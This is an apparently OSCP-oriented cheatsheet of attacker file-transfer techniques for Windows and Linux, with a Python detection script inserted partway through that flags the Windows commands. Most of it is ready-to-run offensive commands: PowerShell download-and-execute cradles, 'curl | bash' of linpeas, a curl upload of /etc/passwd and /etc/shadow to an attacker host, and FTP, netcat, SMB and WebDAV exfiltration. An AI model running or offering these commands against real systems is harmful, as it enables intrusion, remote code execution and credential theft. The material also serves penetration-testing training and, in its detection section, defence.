📁File Transfer

For more detailed methods: https://hackersinterview.com/oscp/oscp-cheatsheet-windows-file-transfer-techniques/

Use my transfile.sh script from here

Windows

Powershell

Download file

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/exploit.exe', 'exploit.exe')

Download and execute without saving on disk

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.2/test.ps1')

To encode using powershell:

# Decode on Linux with base64 -d
[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

To upload using powershell

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
# Run python -m uploadserver on the upload target (the receiving host)
Invoke-FileUpload -Uri http://10.10.14.24:80/upload -File C:\Windows\System32\drivers\etc\hosts

CMD

certutil -urlcache -f ${file url} filename
powershell wget -Uri http://192.168.45.183/plink.exe -OutFile C:\Windows\Temp\plink.exe

Linux and Windows

Python Server

Attacker:

updog -p 80

OR

python3 -m uploadserver

Target:

Download

# Use PSUpload.ps1
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://<ip>:8000/upload -File C:\Path\to\file

Upload:

curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

To base64 encode:

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Path\to\file' -Encoding Byte))
Invoke-WebRequest -Uri http://<ip>:8000/ -Method POST -Body $b64

Apache Server

sudo systemctl start apache2
sudo cp /path/to/file.exe /var/www/html/
# Download from the Apache server with PowerShell
powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe

SMB

Attacker:

impacket-smbserver NAME $(pwd) -smb2support -user aditya -password aditya

Target (PowerShell):

# Copy files
copy \\192.168.220.133\share\nc.exe
# Authenticated mount
net use n: \\10.10.14.24\share /user:test test

or

$pass = ConvertTo-SecureString 'aditya' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('aditya', $pass)
New-PSDrive -Name aditya -PSProvider FileSystem -Credential $cred -Root \\10.10.14.24\aditya
cd aditya:

FTP

Attacker (to host):

python -m pyftpdlib --port 21

Target:

ftp ${IP}

To Upload:

Attacker:

sudo python3 -m pyftpdlib --port 21 --write

Target:

Powershell
(New-Object Net.WebClient).UploadFile('ftp://<ip>/ftp-hosts', 'C:\Path\to\File')
CMD
echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

ftp> open 192.168.49.128

Log in with USER and PASS first.


ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye

Webdav (If port 445 restrictions present)

Attacker:

sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Target:

# DavWWWRoot is required on Windows
dir \\192.168.49.128\DavWWWRoot
# To upload
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
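
Seen from the defending side, the Windows-side commands above leave recognizable process command lines. The following is an added example, not part of the original cheatsheet: a small Python triage pass over constructed command-line samples. The rule names and regexes are this example's own assumptions, not a vendor rule set.

```python
import re

# Rule names are labels invented for this example. Each regex targets one
# transfer command shown on this page and is matched case-insensitively.
RULES = {
    "webclient_download": r"net\.webclient\b.*\.download(file|string)\s*\(",
    "iex_download_cradle": r"\b(iex|invoke-expression)\b.*\.downloadstring\s*\(",
    "certutil_urlcache": r"\bcertutil(\.exe)?\b.*[-/]urlcache\b",
    "web_request_outfile": r"\b(wget|curl|iwr|invoke-webrequest)\b.*-outfile\b",
    "ftp_script_file": r"\bftp(\.exe)?\s.*-s:",
    "webdav_unc_path": r"\\\\[^\\\s]+\\davwwwroot\b",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}


def match_rules(cmdline):
    """Return the sorted names of every rule the command line matches."""
    return sorted(n for n, rx in COMPILED.items() if rx.search(cmdline))


def triage(cmdlines):
    """Map each flagged command line to its rule names; clean lines are omitted."""
    hits = {}
    for line in cmdlines:
        names = match_rules(line)
        if names:
            hits[line] = names
    return hits


# Constructed process-creation command lines: six modelled on this page, three benign.
SAMPLE = [
    r"powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/exploit.exe', 'exploit.exe')",
    r"powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.2/test.ps1')",
    r"certutil -urlcache -f http://192.168.1.2/exploit.exe exploit.exe",
    r"powershell wget -Uri http://192.168.45.183/plink.exe -OutFile C:\Windows\Temp\plink.exe",
    r"ftp -v -n -s:ftpcommand.txt",
    r"dir \\192.168.49.128\DavWWWRoot",
    r"certutil -hashfile C:\Users\Public\filename MD5",
    r"powershell.exe Get-FileHash C:\Users\Public\filename -Algorithm md5",
    r"ftp 192.168.49.128",
]

if __name__ == "__main__":
    for line, names in triage(SAMPLE).items():
        print(", ".join(names), "<-", line)
```

Command-line matching like this is a triage aid for process-creation logs; pair it with network telemetry and PowerShell script block logging rather than relying on it alone.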

Linux

If no write permissions:

curl 10.10.14.22/linpeas.sh | bash

Bash

# Connect to the target web server
exec 3<>/dev/tcp/10.10.10.32/80
# HTTP GET request (HTTP/1.0 needs no Host header and the server closes the connection when done)
echo -e "GET /LinEnum.sh HTTP/1.0\r\n\r\n" >&3
# Print the response
cat <&3

Netcat

To read files:

nc -nv 192.168.49.249 80 < /etc/passwd

To receive:

nc -nlvp 80

Using netcat to send files:

Target:

nc -l -p 1234 -q 1 > something.zip < /dev/null

Attacker:

cat something.zip | netcat <ip> 1234

SSH

If creds are available

scp linenum.sh user@remotehost:/remote/path/

Base64

Use the md5sum command to verify integrity and the file command to check the file type.

Linux

To get base64 output of the file:

base64 file -w 0

Decode

# Use the file command to validate the result
echo "base64 string" | base64 -d > file

Powershell

# To verify: Get-FileHash C:\Users\Public\filename -Algorithm md5
[IO.File]::WriteAllBytes("C:\Users\Public\filename", [Convert]::FromBase64String("base64string"))
